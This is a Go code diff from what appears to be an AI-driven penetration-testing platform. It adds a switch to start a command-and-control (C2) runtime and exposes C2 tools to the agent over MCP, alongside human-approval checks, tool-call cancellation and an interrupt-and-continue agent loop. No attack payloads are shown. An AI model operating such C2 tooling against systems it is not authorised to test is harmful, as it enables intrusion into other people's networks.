// 更新Agent配置
|
||||
// 更新Agent配置(按字段合并,避免部分 JSON 把未出现的字段写成 0)
|
||||
if req.Agent != nil {
|
||||
h.config.Agent = *req.Agent
|
||||
applyAgentConfigUpdate(&h.config.Agent, req.Agent)
|
||||
h.logger.Info("更新Agent配置",
|
||||
zap.Int("max_iterations", h.config.Agent.MaxIterations),
|
||||
zap.Int("tool_timeout_minutes", h.config.Agent.ToolTimeoutMinutes),
|
||||
)
|
||||
if h.agent != nil && req.Agent.MaxIterations != nil {
|
||||
h.agent.UpdateMaxIterations(h.config.Agent.MaxIterations)
|
||||
}
|
||||
if h.mcpServer != nil {
|
||||
h.mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(h.config.Agent.ToolTimeoutMinutes)
|
||||
}
|
||||
}
|
||||
|
||||
// 更新Knowledge配置
|
||||
@@ -676,6 +741,12 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
|
||||
)
|
||||
}
|
||||
|
||||
if req.C2 != nil {
|
||||
v := req.C2.Enabled
|
||||
h.config.C2.Enabled = &v
|
||||
h.logger.Info("更新C2配置", zap.Bool("enabled", v))
|
||||
}
|
||||
|
||||
// 多代理标量(sub_agents 等仍由 config.yaml 维护)
|
||||
if req.MultiAgent != nil {
|
||||
h.config.MultiAgent.Enabled = req.MultiAgent.Enabled
|
||||
@@ -684,7 +755,9 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
|
||||
if req.MultiAgent.PlanExecuteLoopMaxIterations != nil {
|
||||
h.config.MultiAgent.PlanExecuteLoopMaxIterations = *req.MultiAgent.PlanExecuteLoopMaxIterations
|
||||
}
|
||||
h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools = dedupeToolNameList(req.MultiAgent.ToolSearchAlwaysVisibleTools)
|
||||
if req.MultiAgent.ToolSearchAlwaysVisibleTools != nil {
|
||||
h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools = dedupeToolNameList(*req.MultiAgent.ToolSearchAlwaysVisibleTools)
|
||||
}
|
||||
h.logger.Info("更新多代理配置",
|
||||
zap.Bool("enabled", h.config.MultiAgent.Enabled),
|
||||
zap.Bool("robot_use_multi_agent", h.config.MultiAgent.RobotUseMultiAgent),
|
||||
@@ -853,7 +926,7 @@ func (h *ConfigHandler) TestOpenAI(c *gin.Context) {
|
||||
"messages": []map[string]string{
|
||||
{"role": "user", "content": "Hi"},
|
||||
},
|
||||
"max_tokens": 5,
|
||||
"max_completion_tokens": 5,
|
||||
}
|
||||
|
||||
// 使用内部 openai Client 进行测试,若 provider 为 claude 会自动走桥接层
|
||||
@@ -980,6 +1053,18 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
|
||||
h.logger.Info("知识库组件重新初始化完成")
|
||||
}
|
||||
|
||||
// C2:在 ClearTools 之前按配置启停(随后由 c2ToolRegistrar 注册 MCP 工具)
|
||||
h.mu.RLock()
|
||||
c2Rt := h.c2Runtime
|
||||
h.mu.RUnlock()
|
||||
if c2Rt != nil {
|
||||
if err := c2Rt.ReconcileC2AfterConfigApply(); err != nil {
|
||||
h.logger.Error("C2 配置应用失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "C2 启动失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// 现在获取写锁,执行快速的操作
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
@@ -1044,6 +1129,16 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
|
||||
}
|
||||
}
|
||||
|
||||
// 重新注册 C2 MCP 工具(仅当 C2 已启动)
|
||||
if h.c2ToolRegistrar != nil {
|
||||
h.logger.Info("重新注册 C2 MCP 工具")
|
||||
if err := h.c2ToolRegistrar(); err != nil {
|
||||
h.logger.Error("重新注册 C2 MCP 工具失败", zap.Error(err))
|
||||
} else {
|
||||
h.logger.Info("C2 MCP 工具已处理")
|
||||
}
|
||||
}
|
||||
|
||||
// 如果知识库启用,重新注册知识库工具
|
||||
if h.config.Knowledge.Enabled && h.knowledgeToolRegistrar != nil {
|
||||
h.logger.Info("重新注册知识库工具")
|
||||
@@ -1061,6 +1156,9 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
|
||||
h.agent.UpdateToolDescriptionMode(h.config.Security.ToolDescriptionMode)
|
||||
h.logger.Info("Agent配置已更新")
|
||||
}
|
||||
if h.mcpServer != nil {
|
||||
h.mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(h.config.Agent.ToolTimeoutMinutes)
|
||||
}
|
||||
|
||||
// 更新AttackChainHandler的OpenAI配置
|
||||
if h.attackChainHandler != nil {
|
||||
@@ -1126,11 +1224,12 @@ func (h *ConfigHandler) saveConfig() error {
|
||||
return fmt.Errorf("解析配置文件失败: %w", err)
|
||||
}
|
||||
|
||||
updateAgentConfig(root, h.config.Agent.MaxIterations)
|
||||
updateAgentConfig(root, h.config.Agent)
|
||||
updateMCPConfig(root, h.config.MCP)
|
||||
updateOpenAIConfig(root, h.config.OpenAI)
|
||||
updateFOFAConfig(root, h.config.FOFA)
|
||||
updateKnowledgeConfig(root, h.config.Knowledge)
|
||||
updateC2Config(root, h.config.C2)
|
||||
updateRobotsConfig(root, h.config.Robots)
|
||||
updateHitlConfig(root, h.config.Hitl)
|
||||
updateMultiAgentConfig(root, h.config.MultiAgent)
|
||||
@@ -1230,10 +1329,14 @@ func writeYAMLDocument(path string, doc *yaml.Node) error {
|
||||
return os.WriteFile(path, buf.Bytes(), 0644)
|
||||
}
|
||||
|
||||
func updateAgentConfig(doc *yaml.Node, maxIterations int) {
|
||||
func updateAgentConfig(doc *yaml.Node, agent config.AgentConfig) {
|
||||
root := doc.Content[0]
|
||||
agentNode := ensureMap(root, "agent")
|
||||
setIntInMap(agentNode, "max_iterations", maxIterations)
|
||||
setIntInMap(agentNode, "max_iterations", agent.MaxIterations)
|
||||
setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes)
|
||||
setIntInMap(agentNode, "large_result_threshold", agent.LargeResultThreshold)
|
||||
setStringInMap(agentNode, "result_storage_dir", agent.ResultStorageDir)
|
||||
setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath)
|
||||
}
|
||||
|
||||
func updateMCPConfig(doc *yaml.Node, cfg config.MCPConfig) {
|
||||
@@ -1256,6 +1359,19 @@ func updateOpenAIConfig(doc *yaml.Node, cfg config.OpenAIConfig) {
|
||||
if cfg.MaxTotalTokens > 0 {
|
||||
setIntInMap(openaiNode, "max_total_tokens", cfg.MaxTotalTokens)
|
||||
}
|
||||
rn := ensureMap(openaiNode, "reasoning")
|
||||
if strings.TrimSpace(cfg.Reasoning.Mode) != "" {
|
||||
setStringInMap(rn, "mode", cfg.Reasoning.Mode)
|
||||
}
|
||||
if strings.TrimSpace(cfg.Reasoning.Effort) != "" {
|
||||
setStringInMap(rn, "effort", cfg.Reasoning.Effort)
|
||||
}
|
||||
if cfg.Reasoning.AllowClientReasoning != nil {
|
||||
setBoolInMap(rn, "allow_client_reasoning", *cfg.Reasoning.AllowClientReasoning)
|
||||
}
|
||||
if strings.TrimSpace(cfg.Reasoning.Profile) != "" {
|
||||
setStringInMap(rn, "profile", cfg.Reasoning.Profile)
|
||||
}
|
||||
}
|
||||
|
||||
func updateFOFAConfig(doc *yaml.Node, cfg config.FofaConfig) {
|
||||
@@ -1309,6 +1425,12 @@ func updateKnowledgeConfig(doc *yaml.Node, cfg config.KnowledgeConfig) {
|
||||
setIntInMap(indexingNode, "retry_delay_ms", cfg.Indexing.RetryDelayMs)
|
||||
}
|
||||
|
||||
func updateC2Config(doc *yaml.Node, cfg config.C2Config) {
|
||||
root := doc.Content[0]
|
||||
c2Node := ensureMap(root, "c2")
|
||||
setBoolInMap(c2Node, "enabled", cfg.EnabledEffective())
|
||||
}
|
||||
|
||||
func mergeHitlToolWhitelistSlice(existing, add []string) []string {
|
||||
seen := make(map[string]struct{})
|
||||
out := make([]string, 0, len(existing)+len(add))
|
||||
@@ -1354,6 +1476,11 @@ func updateRobotsConfig(doc *yaml.Node, cfg config.RobotsConfig) {
|
||||
root := doc.Content[0]
|
||||
robotsNode := ensureMap(root, "robots")
|
||||
|
||||
if cfg.Session.StrictUserIdentity != nil {
|
||||
sessionNode := ensureMap(robotsNode, "session")
|
||||
setBoolInMap(sessionNode, "strict_user_identity", *cfg.Session.StrictUserIdentity)
|
||||
}
|
||||
|
||||
wecomNode := ensureMap(robotsNode, "wecom")
|
||||
setBoolInMap(wecomNode, "enabled", cfg.Wecom.Enabled)
|
||||
setStringInMap(wecomNode, "token", cfg.Wecom.Token)
|
||||
@@ -1366,12 +1493,14 @@ func updateRobotsConfig(doc *yaml.Node, cfg config.RobotsConfig) {
|
||||
setBoolInMap(dingtalkNode, "enabled", cfg.Dingtalk.Enabled)
|
||||
setStringInMap(dingtalkNode, "client_id", cfg.Dingtalk.ClientID)
|
||||
setStringInMap(dingtalkNode, "client_secret", cfg.Dingtalk.ClientSecret)
|
||||
setBoolInMap(dingtalkNode, "allow_conversation_id_fallback", cfg.Dingtalk.AllowConversationIDFallback)
|
||||
|
||||
larkNode := ensureMap(robotsNode, "lark")
|
||||
setBoolInMap(larkNode, "enabled", cfg.Lark.Enabled)
|
||||
setStringInMap(larkNode, "app_id", cfg.Lark.AppID)
|
||||
setStringInMap(larkNode, "app_secret", cfg.Lark.AppSecret)
|
||||
setStringInMap(larkNode, "verify_token", cfg.Lark.VerifyToken)
|
||||
setBoolInMap(larkNode, "allow_chat_id_fallback", cfg.Lark.AllowChatIDFallback)
|
||||
}
|
||||
|
||||
func updateMultiAgentConfig(doc *yaml.Node, cfg config.MultiAgentConfig) {
|
||||
|
||||
@@ -10,6 +10,7 @@ import (
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
@@ -43,8 +44,11 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
var sseWriteMu sync.Mutex
|
||||
var ssePublishConversationID string
|
||||
sendEvent := func(eventType, message string, data interface{}) {
|
||||
if eventType == "error" && baseCtx != nil && errors.Is(context.Cause(baseCtx), ErrTaskCancelled) {
|
||||
return
|
||||
if eventType == "error" && baseCtx != nil {
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
return
|
||||
}
|
||||
}
|
||||
ev := StreamEvent{Type: eventType, Message: message, Data: data}
|
||||
b, errMarshal := json.Marshal(ev)
|
||||
@@ -114,36 +118,19 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
}
|
||||
|
||||
var cancelWithCause context.CancelCauseFunc
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
defer timeoutCancel()
|
||||
defer cancelWithCause(nil)
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||
})
|
||||
|
||||
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
|
||||
var errorMsg string
|
||||
if errors.Is(err, ErrTaskAlreadyRunning) {
|
||||
errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。"
|
||||
sendEvent("error", errorMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"errorType": "task_already_running",
|
||||
})
|
||||
} else {
|
||||
errorMsg = "❌ 无法启动任务: " + err.Error()
|
||||
sendEvent("error", errorMsg, nil)
|
||||
}
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errorMsg, assistantMessageID)
|
||||
}
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
return
|
||||
}
|
||||
curFinalMessage := prep.FinalMessage
|
||||
curHistory := prep.History
|
||||
roleTools := prep.RoleTools
|
||||
|
||||
taskStatus := "completed"
|
||||
defer h.tasks.FinishTask(conversationID, taskStatus)
|
||||
// 仅在成功 StartTask 后再 FinishTask。若 StartTask 因 ErrTaskAlreadyRunning 失败仍 defer FinishTask,
|
||||
// 会误删其他连接上正在运行的同会话任务,导致「第一次拦截、第二次却放行」。
|
||||
taskOwned := false
|
||||
defer func() {
|
||||
if taskOwned {
|
||||
h.tasks.FinishTask(conversationID, taskStatus)
|
||||
}
|
||||
}()
|
||||
|
||||
sendEvent("progress", "正在启动 Eino ADK 单代理(ChatModelAgent)...", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
@@ -161,28 +148,112 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
return
|
||||
}
|
||||
|
||||
result, runErr := multiagent.RunEinoSingleChatModelAgent(
|
||||
taskCtx,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
conversationID,
|
||||
prep.FinalMessage,
|
||||
prep.History,
|
||||
prep.RoleTools,
|
||||
progressCallback,
|
||||
)
|
||||
var result *multiagent.RunResult
|
||||
var runErr error
|
||||
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
|
||||
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
|
||||
var errorMsg string
|
||||
if errors.Is(err, ErrTaskAlreadyRunning) {
|
||||
errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。"
|
||||
sendEvent("error", errorMsg, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"errorType": "task_already_running",
|
||||
})
|
||||
} else {
|
||||
errorMsg = "❌ 无法启动任务: " + err.Error()
|
||||
sendEvent("error", errorMsg, nil)
|
||||
}
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID)
|
||||
}
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
taskOwned = true
|
||||
|
||||
var cumulativeMCPExecutionIDs []string
|
||||
|
||||
for {
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
||||
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||
})
|
||||
|
||||
result, runErr = multiagent.RunEinoSingleChatModelAgent(
|
||||
taskCtxLoop,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
conversationID,
|
||||
curFinalMessage,
|
||||
curHistory,
|
||||
roleTools,
|
||||
progressCallback,
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
)
|
||||
timeoutCancel()
|
||||
|
||||
if result != nil && len(result.MCPExecutionIDs) > 0 {
|
||||
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
|
||||
}
|
||||
|
||||
if runErr == nil {
|
||||
break
|
||||
}
|
||||
|
||||
if runErr != nil {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
note := h.tasks.TakeInterruptContinueNote(conversationID)
|
||||
icSummary := interruptContinueTimelineSummary(note)
|
||||
progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"rawReason": strings.TrimSpace(note),
|
||||
"emptyReason": strings.TrimSpace(note) == "",
|
||||
"kind": "no_active_mcp_tool",
|
||||
})
|
||||
inject := formatInterruptContinueUserMessage(note)
|
||||
// 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。
|
||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
||||
curHistory = hist
|
||||
}
|
||||
curFinalMessage = inject
|
||||
sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "interrupt_continue",
|
||||
})
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
continue
|
||||
}
|
||||
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
if errors.Is(cause, ErrTaskCancelled) {
|
||||
taskStatus = "cancelled"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
cancelMsg := "任务已被用户取消,后续操作已停止。"
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", cancelMsg, assistantMessageID)
|
||||
if result != nil {
|
||||
if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil {
|
||||
h.logger.Warn("合并取消前的部分回复失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil {
|
||||
h.logger.Warn("更新取消后的助手消息失败", zap.Error(err))
|
||||
}
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
|
||||
}
|
||||
sendEvent("cancelled", cancelMsg, map[string]interface{}{
|
||||
@@ -198,7 +269,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
timeoutMsg := "任务执行超时,已自动终止。"
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", timeoutMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil)
|
||||
}
|
||||
sendEvent("error", timeoutMsg, map[string]interface{}{
|
||||
@@ -215,7 +286,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
errMsg := "执行失败: " + runErr.Error()
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
|
||||
}
|
||||
sendEvent("error", errMsg, map[string]interface{}{
|
||||
@@ -227,17 +298,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
}
|
||||
|
||||
if assistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(result.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, _ = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
result.Response,
|
||||
mcpIDsJSON,
|
||||
assistantMessageID,
|
||||
)
|
||||
_ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
@@ -247,7 +308,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
|
||||
}
|
||||
|
||||
sendEvent("response", result.Response, map[string]interface{}{
|
||||
"mcpExecutionIds": result.MCPExecutionIDs,
|
||||
"mcpExecutionIds": cumulativeMCPExecutionIDs,
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
"agentMode": "eino_single",
|
||||
@@ -305,25 +366,18 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
|
||||
prep.History,
|
||||
prep.RoleTools,
|
||||
progressCallback,
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
)
|
||||
if runErr != nil {
|
||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": runErr.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if prep.AssistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(result.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, _ = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
result.Response,
|
||||
mcpIDsJSON,
|
||||
prep.AssistantMessageID,
|
||||
)
|
||||
_ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
_ = h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput)
|
||||
|
||||
@@ -268,8 +268,8 @@ func (h *FofaHandler) ParseNaturalLanguage(c *gin.Context) {
|
||||
{"role": "system", "content": systemPrompt},
|
||||
{"role": "user", "content": userPrompt},
|
||||
},
|
||||
"temperature": 0.1,
|
||||
"max_tokens": 1200,
|
||||
"temperature": 0.1,
|
||||
"max_completion_tokens": 12000,
|
||||
}
|
||||
|
||||
// OpenAI 返回结构:只需要 choices[0].message.content
|
||||
|
||||
@@ -233,6 +233,15 @@ func (m *HITLManager) shouldInterrupt(conversationID, toolName string) (hitlRunt
|
||||
return cfg, !inWhitelist
|
||||
}
|
||||
|
||||
// NeedsToolApproval 与 Agent 工具层 shouldInterrupt 语义一致:仅当该会话已开启人机协同且工具不在免审批白名单时为 true。
|
||||
func (m *HITLManager) NeedsToolApproval(conversationID, toolName string) bool {
|
||||
if m == nil {
|
||||
return false
|
||||
}
|
||||
_, need := m.shouldInterrupt(conversationID, toolName)
|
||||
return need
|
||||
}
|
||||
|
||||
func (m *HITLManager) CreatePendingInterrupt(conversationID, assistantMessageID, mode, toolName, toolCallID, payload string) (*pendingInterrupt, error) {
|
||||
now := time.Now()
|
||||
id := "hitl_" + strings.ReplaceAll(uuid.New().String(), "-", "")
|
||||
|
||||
@@ -1,6 +1,9 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"io"
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
@@ -245,6 +248,37 @@ func (h *MonitorHandler) GetExecution(c *gin.Context) {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "执行记录未找到"})
|
||||
}
|
||||
|
||||
// CancelExecution 手动取消进行中的 MCP 工具调用(仅取消该次 tools/call 的上下文,不停止整条 Agent / 迭代任务)
|
||||
// 请求体可选 JSON:{ "note": "用户说明" },将与工具已返回输出合并交给模型(含「用户终止说明」标题块,与命令行原文区分)。
|
||||
func (h *MonitorHandler) CancelExecution(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
if id == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID不能为空"})
|
||||
return
|
||||
}
|
||||
note := ""
|
||||
dec := json.NewDecoder(c.Request.Body)
|
||||
var body struct {
|
||||
Note string `json:"note"`
|
||||
}
|
||||
if err := dec.Decode(&body); err != nil && !errors.Is(err, io.EOF) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体须为 JSON,例如 {\"note\":\"说明\"},可为空对象"})
|
||||
return
|
||||
}
|
||||
note = strings.TrimSpace(body.Note)
|
||||
if h.mcpServer.CancelToolExecutionWithNote(id, note) {
|
||||
h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "internal"), zap.Bool("hasNote", note != ""))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id})
|
||||
return
|
||||
}
|
||||
if h.externalMCPMgr != nil && h.externalMCPMgr.CancelToolExecutionWithNote(id, note) {
|
||||
h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "external"), zap.Bool("hasNote", note != ""))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "未找到进行中的工具执行,或该任务已结束"})
|
||||
}
|
||||
|
||||
// BatchGetToolNames 批量获取工具执行的工具名称(消除前端 N+1 请求)
|
||||
func (h *MonitorHandler) BatchGetToolNames(c *gin.Context) {
|
||||
var req struct {
|
||||
@@ -317,7 +351,7 @@ func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
|
||||
totalCalls := 1
|
||||
successCalls := 0
|
||||
failedCalls := 0
|
||||
if exec.Status == "failed" {
|
||||
if exec.Status == "failed" || exec.Status == "cancelled" {
|
||||
failedCalls = 1
|
||||
} else if exec.Status == "completed" {
|
||||
successCalls = 1
|
||||
@@ -381,7 +415,7 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
|
||||
|
||||
stats := toolStats[exec.ToolName]
|
||||
stats.totalCalls++
|
||||
if exec.Status == "failed" {
|
||||
if exec.Status == "failed" || exec.Status == "cancelled" {
|
||||
stats.failedCalls++
|
||||
} else if exec.Status == "completed" {
|
||||
stats.successCalls++
|
||||
|
||||
+164
-62
@@ -11,6 +11,7 @@ import (
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
@@ -60,8 +61,11 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
sendEvent := func(eventType, message string, data interface{}) {
|
||||
// 用户主动停止时,Eino 可能仍会并发上报 eventType=="error"。
|
||||
// 为避免 UI 看到“取消错误 + cancelled 文案”两条回复,这里直接丢弃取消对应的 error。
|
||||
if eventType == "error" && baseCtx != nil && errors.Is(context.Cause(baseCtx), ErrTaskCancelled) {
|
||||
return
|
||||
if eventType == "error" && baseCtx != nil {
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
return
|
||||
}
|
||||
}
|
||||
ev := StreamEvent{Type: eventType, Message: message, Data: data}
|
||||
b, errMarshal := json.Marshal(ev)
|
||||
@@ -130,15 +134,35 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
})
|
||||
}
|
||||
|
||||
baseCtx, cancelWithCause := context.WithCancelCause(context.Background())
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
defer timeoutCancel()
|
||||
defer cancelWithCause(nil)
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||
var cancelWithCause context.CancelCauseFunc
|
||||
curFinalMessage := prep.FinalMessage
|
||||
curHistory := prep.History
|
||||
roleTools := prep.RoleTools
|
||||
orch := strings.TrimSpace(req.Orchestration)
|
||||
|
||||
taskStatus := "completed"
|
||||
// 仅在成功 StartTask 后再 FinishTask;避免「任务已存在」分支 return 时误删正在运行的同会话任务。
|
||||
taskOwned := false
|
||||
defer func() {
|
||||
if taskOwned {
|
||||
h.tasks.FinishTask(conversationID, taskStatus)
|
||||
}
|
||||
}()
|
||||
|
||||
sendEvent("progress", "正在启动 Eino 多代理...", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
})
|
||||
|
||||
